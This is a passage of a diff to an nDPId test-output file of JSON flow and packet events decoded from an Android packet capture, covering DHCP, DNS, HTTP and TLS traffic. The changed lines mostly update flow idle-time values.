+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} +00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} @@ -67,11 +67,11 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} +00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 